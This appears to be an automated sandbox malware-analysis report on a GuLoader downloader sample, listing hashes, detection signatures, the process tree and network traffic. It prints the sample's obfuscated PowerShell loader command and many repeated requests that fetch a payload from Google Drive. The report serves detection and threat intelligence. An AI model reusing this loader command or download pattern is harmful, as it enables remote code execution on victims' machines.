Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TVPfW4WUdj.exe

Overview

General Information

Sample name:TVPfW4WUdj.exe
renamed because original name is a hash value
Original sample name:efef6cea36d9dd6e74cdf5adb9108ab1d0d3429de4d66898595f6c954e95c377.exe
Analysis ID:1588326
MD5:5dec892fcaf6f21ac6780c69f631f82c
SHA1:851ae1f87751cbed45a523fc340771f998e62db1
SHA256:efef6cea36d9dd6e74cdf5adb9108ab1d0d3429de4d66898595f6c954e95c377
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • TVPfW4WUdj.exe (PID: 1992 cmdline: "C:\Users\user\Desktop\TVPfW4WUdj.exe" MD5: 5DEC892FCAF6F21AC6780C69F631F82C)
    • powershell.exe (PID: 5268 cmdline: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 2160 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2661194576.00000000047B4000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.1781252589.000000000A374000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious Script Execution From Temp Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , CommandLine: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TVPfW4WUdj.exe", ParentImage: C:\Users\user\Desktop\TVPfW4WUdj.exe, ParentProcessId: 1992, ParentProcessName: TVPfW4WUdj.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , ProcessId: 5268, ProcessName: powershell.exe
      Sigma detected: Msiexec Initiated Connection
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.206.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2160, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , CommandLine: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TVPfW4WUdj.exe", ParentImage: C:\Users\user\Desktop\TVPfW4WUdj.exe, ParentProcessId: 1992, ParentProcessName: TVPfW4WUdj.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , ProcessId: 5268, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T00:01:51.246674+010028032702Potentially Bad Traffic192.168.2.849708216.58.206.46443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\TVPfW4WUdj.exeReversingLabs: Detection: 55%
      Multi AV Scanner detection for submitted file
      Source: TVPfW4WUdj.exeVirustotal: Detection: 70%Perma Link
      Source: TVPfW4WUdj.exeReversingLabs: Detection: 55%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
      Source: TVPfW4WUdj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49772 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49781 version: TLS 1.2
      Source: TVPfW4WUdj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: qm.Core.pdbk source: powershell.exe, 00000002.00000002.1779505501.0000000008B12000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49708 -> 216.58.206.46:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
